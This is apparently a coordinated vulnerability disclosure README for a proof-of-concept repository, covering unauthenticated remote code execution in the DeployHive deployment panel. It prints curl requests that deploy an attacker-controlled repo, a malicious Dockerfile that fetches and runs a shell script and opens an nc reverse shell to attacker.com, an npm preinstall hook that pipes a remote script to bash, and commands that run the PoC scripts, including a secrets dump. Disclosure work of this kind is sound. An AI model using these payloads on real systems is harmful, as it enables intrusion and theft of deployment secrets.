BlessedOn3/poc-deployhive-unauth-rce

# CVE — iabdullahmumtaz/DeployHive Unauthenticated RCE via Docker Build + npm Scripts **Severity:** Critical (CVSS 3.1: 10.0) **Affected version:** DeployHive v1.0.0 **Reporter:** Mateus Gama (theblessone.sec@gmail.com) **Disclosure:** Coordinated — 2026-05-27 (issue #1) ## Summary DeployHive is a DevOps deployment panel. The Express server binds to `0.0.0.0` by default with **no authentication on any endpoint**. An attacker can deploy arbitrary code in two ways. | # | Finding | CVSS | |---|---|---| | 01 | Unauthenticated RCE via Docker build of attacker-controlled repo | **10.0** | | 02 | Unauthenticated RCE via npm preinstall/postinstall lifecycle scripts | 9.8 | | 03 | Unauthenticated env var injection into deployed containers | 8.1 | | 04 | Unauthenticated read of all projects, logs, and secrets | 7.5 | ## Attack Chain — Docker RCE # 1. Create project pointing to malicious repo (no auth) curl -X POST http://victim:6012/api/projects \ -H 'Content-Type: application/json' \ -d '{"name":"x","repoUrl":"https://github.com/attacker/malicious","branch":"main"}' # 2. Trigger deploy — clones repo, docker build + run (RestartPolicy: unless-stopped) curl -X POST http://victim:6012/api/deployments \ -H 'Content-Type: application/json' \ -d '{"projectId":""}' Malicious `Dockerfile` in attacker's repo: FROM alpine RUN curl http://attacker.com/shell.sh | sh CMD ["sh","-c","while true; do nc attacker.com 4444 -e /bin/sh; sleep 5; done"] ## Attack Chain — npm RCE (no Docker needed) Malicious `package.json` (no `Dockerfile` in repo): { "name": "legit", "scripts": { "preinstall": "curl http://attacker.com/shell.sh | bash" } } DeployHive runs `execSync('npm install --omit=dev', { cwd: repoPath })` on the HOST. The preinstall hook executes as an OS command. ## Proof of Concept # Full Docker RCE (requires attacker-controlled git repo) bash poc/docker_rce.sh http://target:6012 https://github.com/your/malicious-repo # npm lifecycle RCE bash poc/npm_rce.sh http://target:6012 https://github.com/your/npm-malicious-repo # Dump all project secrets bash poc/dump_secrets.sh http://target:6012 ## Remediation 1. Add authentication middleware globally before all routes 2. Bind to `127.0.0.1` by default: `app.listen(PORT, '127.0.0.1')` 3. Validate `repoUrl` against an allowlist 4. Run `npm install` inside a sandboxed container, not on the host